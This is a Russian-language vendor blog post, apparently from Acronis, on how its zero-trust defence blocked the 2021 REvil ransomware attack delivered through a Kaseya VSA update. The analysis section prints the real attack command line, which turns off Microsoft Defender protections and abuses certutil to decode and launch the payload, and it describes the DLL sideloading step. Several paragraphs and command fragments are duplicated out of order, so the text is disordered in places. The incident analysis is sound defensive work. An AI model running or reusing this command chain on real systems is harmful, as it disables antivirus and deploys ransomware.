Защита от атаки REvil на Kaseya в действии:
опыт избежавших шифрования
опыт избежавших шифрования
Сегодня мы расскажем о том, как происходит защита от подобных атак еще на том этапе, когда природа поражения была неизвестна. Данный пост построен на основе данных защиты решений Acronis и содержит информацию о действиях вредоносного ПО, а также о реакциях нашей системы и индикаторы компрометации.
Мы уже рассказывали об атаке на Kaseya VSA, которая по последним данным привела к остановке работы систем более чем в 1500 компаниях. Подробнее почитать об этом можно здесь.
Но что интересно, еще в пятницу 2 июля, когда произошла атака, CEO Kaseya CEO Фред Воколла обещал, что компания постарается восстановить работу сервисов в течение 24 часов. Однако сделать это не удалось, ни в субботу, ни в понедельник. Kaseya пришлось многократно откладывать время восстановления, потому что справиться с последствиями атаки оказалось намного сложнее, чем предотвратить.
Но что интересно, еще в пятницу 2 июля, когда произошла атака, CEO Kaseya CEO Фред Воколла обещал, что компания постарается восстановить работу сервисов в течение 24 часов. Однако сделать это не удалось, ни в субботу, ни в понедельник. Kaseya пришлось многократно откладывать время восстановления, потому что справиться с последствиями атаки оказалось намного сложнее, чем предотвратить.
Около 50 клиентов Kaseya (в основном MSP) используют on-premise версию VSA, и поэтому их серверы были скомпрометированы в первую очередь. В результате пострадало около миллиона представителей малого бизнеса, которые являлись клиентами соответствующих провайдеров, а сами MSP начали серьезно беспокоиться, ведь сервис не удавалось восстановить несколько дней. Кстати, как раз об этом мы говорили Acronis Cyberthreats Report 2020: сегодня провайдерам необходимо не только отчитываться о взломах и утечках, но также принимать меры, чтобы защитить своих клиентов от будущих угроз.
Но тут возникает вопрос: а можно ли было защититься от угрозы, которая в итоге на несколько дней вывела из строя огромное количество систем по всему миру?
Вариант Acronis
Атака произошла 2 июля 2021 и один из наших клиентов, использующий систему защиты от Acronis, также попал "под раздачу". Коллеги разрешили поделиться информацией о ходе атаки, которую мы раскрываем дальше.
По данным анализа первоначально вредоносное ПО попало в сеть компании вместе с обновлением Kaseya VSA, подписанным действующим цифровым сертификатом.
В систему попал компонент REvil Ransomware, но поскольку система Acronis Detection and Response была настроена на "нулевое доверие", решение обнаружило аномальную активность и заблокировало работу нового ПО до момента разрешения проблемы со стороны персонала. В результате, несмотря на то, что атака REvil была запущена сертифицированным обновлением Kaseya VSA, системы пользователя не пострадали.
Подробные данные об атаке Установленная система защиты обнаружила следующие действия вредоносного ПО:
1. C:\program files (x86)\kaseya\[CUSTOMER ID]\agentmon.exe
Set-MpPreference -DisableRealtimeMonitoring $true
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableScriptScanning $true -EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend & copy /Y
C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableScriptScanning $true -EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend
Но тут возникает вопрос: а можно ли было защититься от угрозы, которая в итоге на несколько дней вывела из строя огромное количество систем по всему миру?
Вариант Acronis
Атака произошла 2 июля 2021 и один из наших клиентов, использующий систему защиты от Acronis, также попал "под раздачу". Коллеги разрешили поделиться информацией о ходе атаки, которую мы раскрываем дальше.
По данным анализа первоначально вредоносное ПО попало в сеть компании вместе с обновлением Kaseya VSA, подписанным действующим цифровым сертификатом.
В систему попал компонент REvil Ransomware, но поскольку система Acronis Detection and Response была настроена на "нулевое доверие", решение обнаружило аномальную активность и заблокировало работу нового ПО до момента разрешения проблемы со стороны персонала. В результате, несмотря на то, что атака REvil была запущена сертифицированным обновлением Kaseya VSA, системы пользователя не пострадали.
Подробные данные об атаке Установленная система защиты обнаружила следующие действия вредоносного ПО:
1. C:\program files (x86)\kaseya\[CUSTOMER ID]\agentmon.exe
- Обновление было запущено через агента Kaseya. Так называемый "Kaseya VSA Agent Hot-fix" вызвал командную строку и запустил код. Обновление, требующее прав администратора на запуск, было подготовлнео хакерами за счет доступа к консоли Kaseya VSA через новый эксплойт нулевого дня.
- Строка cmd.exe была вызвана для запуска следующих команд:
Set-MpPreference -DisableRealtimeMonitoring $true
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableScriptScanning $true -EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend & copy /Y
C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
- Запуск скрипта PowerShell сопровождался командой "ping localhost", которая часто используются в качестве паузы.
- Powershell была запущена через cmd.exe со следующими параметрами
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableScriptScanning $true -EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend
- Цель этого действия — отключить различные функции безопасности Microsoft Defender.
- И именно на этом этапе сработало обнаружение Acronis (на картинке ниже).
4. Cert.exe
- Этот исполняемый файл был также вызван из командной строки cmd.exe со следующими параметрами:
- Попытка декодировать "c:\kworking\agent.crt" с помощью Certutil.exe также была остановлена защитой Acronis (на картинке ниже).
Далее Certutil.exe перемещается в "C:\windows", в файл дописывается рандомное количество случайных байт,
- Вероятно, это делается для того, чтобы избежать сигнатурного детектирования по сумме MD5 и проверки пути доступа к файлу (кстати, использование вполне легитимной утилиты, такой как certutil.exe, уже стало типичной техникой "living-off-the-land", которую хакеры применяют с большим энтузиазмом).
- Предварительно расшифрованный исполняемый файл, подписанный сертификатом "PB03 TRANSPORT LTD" также запускается путем вызова из командной строки.
- Agent.exe пытается создать файлы MsMpEng.exe и mpsvc.dll. И это действие вновь блокируется утилитами Acronis (наглядно показано на двух изображениях ниже).
- MsMpEng.exe — это устаревшая, но совершенно "чистая" версия WindowsDefender. Но именно она должна запустить mpsvc.dll как стороннюю DLL, чтобы приступить к шифрованию.
- Стоит отметить, что исполняемые файлы agent.exe и mpsvc.dll на тот момент были неизвестны как угрозы, о чем свидетельствуют следующие скриншоты.
Итак, что позволило сделать использование системы "нулевого доверия" от Acronis? Решение обнаружило расшифровку файлов — распаковку agent.exe из agent.crt. Далее решение не позволило agent.exe создать файлы в системных директориях, атака провалилась и операционным системам заказчика не было нанесено никакого ущерба. Из этого опыта можно сделать простой вывод: используйте решения, способные блокировать подозрительные действия даже не кажущихся подозрительными файлов и библиотек.